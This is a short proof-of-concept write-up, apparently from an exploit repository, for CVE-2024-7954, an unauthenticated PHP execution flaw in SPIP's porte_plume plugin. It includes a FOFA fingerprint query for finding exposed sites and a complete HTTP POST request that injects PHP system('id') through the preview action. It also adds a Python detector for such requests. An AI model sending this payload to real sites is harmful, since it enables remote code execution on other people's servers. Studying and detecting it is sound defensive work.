POC/wpoc/SPIP/SPIP插件porte_plume存在任意PHP执行漏洞(CVE-2024-7954).md
eeeeeeeeee-code 06c8413e64 first commit
2025-03-04 23:12:57 +08:00


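# SPIP plugin porte_plume arbitrary PHP execution vulnerability (CVE-2024-7954)
# 1. Vulnerability overview
The porte_plume plugin used by SPIP versions before 4.30-alpha2, 4.2.13 and 4.1.16 contains an arbitrary code execution vulnerability. A remote, unauthenticated attacker can execute arbitrary PHP code as the SPIP user by sending a crafted HTTP request.
# 2. Affected versions
SPIP plugin porte_plume
# 3. Asset mapping
+ FOFA: `icon_hash=="-1224668706"`
+ Fingerprint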
![1725074957647-c35def1f-98a2-4638-8491-08b2d4d9feef.png](./img/MgI_aUY7wIBqRyz7/1725074957647-c35def1f-98a2-4638-8491-08b2d4d9feef-386188.png)
# 4. Vulnerability reproduction
```http
POST /index.php?action=porte_plume_previsu HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.5481.178 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Content-Length: 52

data=AA_[<img111111>->URL`<?php system("id");?>`]_BB
```
![1724987402306-140c705e-9e86-409c-a1d9-55ba7910f820.png](./img/MgI_aUY7wIBqRyz7/1724987402306-140c705e-9e86-409c-a1d9-55ba7910f820-580953.png)
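
For detection, an added example (not part of the original write-up): a Python check that flags captured requests shaped like the one above, i.e. a request to the `porte_plume_previsu` action whose `data` field carries a PHP opening tag. The function names, the `(target, body)` record layout and the choice to also look for `action` in the form body are assumptions; the sample records are constructed, except the second body, which is the one shown on this page.

```python
import re
from urllib.parse import parse_qs, urlsplit

PREVIEW_ACTION = "porte_plume_previsu"  # action name from the request on this page
# "<?php" or the short echo tag "<?=", matched after URL decoding
PHP_OPEN_TAG = re.compile(r"<\?(php|=)", re.IGNORECASE)


def _params(encoded: str) -> dict:
    """Decode a query string or urlencoded form body into {name: [values]}."""
    return parse_qs(encoded, keep_blank_values=True)


def is_suspicious(target: str, body: str) -> bool:
    """True if a request to the preview action carries a PHP tag in `data`."""
    query = _params(urlsplit(target).query)
    form = _params(body)
    # Assumption: the action may arrive in the query string or in the form body.
    actions = query.get("action", []) + form.get("action", [])
    if PREVIEW_ACTION not in actions:
        return False
    values = query.get("data", []) + form.get("data", [])
    return any(PHP_OPEN_TAG.search(value) for value in values)


def flagged(records) -> list:
    """Return the indexes of the records that match the pattern."""
    return [i for i, (target, body) in enumerate(records)
            if is_suspicious(target, body)]


# Constructed (target, body) records, as a WAF or proxy body log might hold them.
SAMPLES = [
    # ordinary editor preview, no PHP tag
    ("/index.php?action=porte_plume_previsu", "data=Hello+%7B%7Bworld%7D%7D"),
    # request body as shown in the reproduction section of this page
    ("/index.php?action=porte_plume_previsu",
     'data=AA_[<img111111>->URL`<?php system("id");?>`]_BB'),
    # percent-encoded short tag, action sent in the form body
    ("/index.php", "action=porte_plume_previsu&data=%3C%3F%3D1%3F%3E"),
    # PHP tag sent to a different action: outside this check's scope
    ("/index.php?action=other", "data=%3C%3Fphp"),
]

if __name__ == "__main__":
    print(flagged(SAMPLES))
```

Standard access logs do not record POST bodies, so this check needs a source that does (WAF audit log, reverse-proxy body capture, or packet capture).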
> Updated: 2024-09-05 23:21:35
> Original: <https://www.yuque.com/xiaokp7/ocvun2/gzh7mvbhub0l35ct>